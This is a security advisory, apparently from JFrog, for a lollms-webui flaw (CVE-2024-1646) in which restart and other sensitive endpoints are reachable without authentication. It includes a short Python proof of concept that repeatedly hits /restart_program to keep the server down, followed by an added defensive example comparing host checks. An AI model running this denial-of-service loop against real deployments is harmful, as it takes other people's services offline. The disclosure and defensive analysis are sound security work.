JFrog Security Research

JFSA-2024-001028815 - lollms-webui exposed endpoints DoS

CVE-2024-1646 | CVSS 8.2

JFrog Severity: high

Discovered by Naveh Racovsky of the JFrog Security Research Team

Published 15 Apr, 2024 | Last updated 15 Apr, 2024

Exposed endpoints in lollms-webui lead to denial of service


Affected versions (,9.2], fixed in 9.3

Multiple sensitive endpoints are not adequately protected from access by outside actors. The only protection in place is a comparison of the configured host parameter against a single value:

if lollmsElfServer.config.host==""

However, the application may be run bound to a specific interface address, a value this comparison does not account for, so the check is insufficient and the sensitive endpoints remain reachable by any client that can connect to that interface.

# PoC.py
import requests
from time import sleep

IP_ADDRESS = "aaa.bbb.ccc.ddd"  # Change this to the address of the chosen interface
PORT = 9600

# Hit the unauthenticated /restart_program endpoint in a loop: every request
# restarts the server process, so the service never stays up.
while True:
    try:
        response = requests.get(f"http://{IP_ADDRESS}:{PORT}/restart_program")
        print(response.status_code)
    except Exception:
        # The server is unreachable while it restarts; wait and try again.
        pass
    sleep(1)
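The following is an added example, not code from lollms-webui or from the JFrog advisory. It places a single-value host comparison (the pattern quoted above) beside a check that classifies the bind address, so the gap the PoC exploits can be reproduced offline. All function and constant names are hypothetical, and the sample bind addresses are constructed from documentation ranges.

```python
# Added example, not lollms-webui project code. It contrasts a single-value
# host comparison (the pattern quoted in the advisory) with a check based on
# the class of the bind address. Function and constant names are hypothetical.
import ipaddress

# The one value the quoted check compares against; the advisory's snippet
# shows an empty string. The exact value is beside the point: any equality
# test against one string leaves every other bind address unguarded.
EXPOSED_VALUE = ""

LOCAL_NAMES = {"localhost"}


def weak_is_exposed(host: str) -> bool:
    """Single-value comparison: exposed only if host is exactly EXPOSED_VALUE.
    Binding to a specific interface address (e.g. 192.0.2.10) is not caught."""
    return host == EXPOSED_VALUE


def strict_is_exposed(host: str) -> bool:
    """Exposed unless the bind address is demonstrably loopback.
    Unknown or unparseable values fail closed (treated as exposed)."""
    host = host.strip()
    if host in LOCAL_NAMES:
        return False
    try:
        return not ipaddress.ip_address(host).is_loopback
    except ValueError:
        # Empty string, other hostnames, malformed input: assume exposed.
        return True


def guard_sensitive_endpoint(host: str, is_exposed=strict_is_exposed) -> dict:
    """Hypothetical gate for an endpoint such as /restart_program.
    Returns the same response shape either way so callers can inspect it."""
    if is_exposed(host):
        return {"status": False,
                "error": "This endpoint is disabled while the server is exposed"}
    return {"status": True}


def compare_checks(host: str) -> tuple:
    """(weak check allows the request, strict check allows the request)
    for a given configured bind address."""
    return (guard_sensitive_endpoint(host, weak_is_exposed)["status"],
            guard_sensitive_endpoint(host, strict_is_exposed)["status"])


if __name__ == "__main__":
    # Constructed sample bind addresses (documentation ranges, not real hosts).
    for h in ["", "127.0.0.1", "localhost", "::1", "0.0.0.0", "192.0.2.10", "::"]:
        weak_ok, strict_ok = compare_checks(h)
        print(f"{h!r:14} weak allows={weak_ok!s:5} strict allows={strict_ok}")
```

For a specific interface address such as 192.0.2.10 (and for 0.0.0.0) the weak comparison lets the request through while the strict check refuses it; loopback addresses and "localhost" pass both. Gating on the configured bind address is still only a partial control: a reverse proxy forwarding to a loopback listener makes the endpoint reachable again, so destructive endpoints such as a process restart should additionally require authentication.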

No mitigations are supplied for this issue; upgrade to version 9.3, where the issue is fixed.

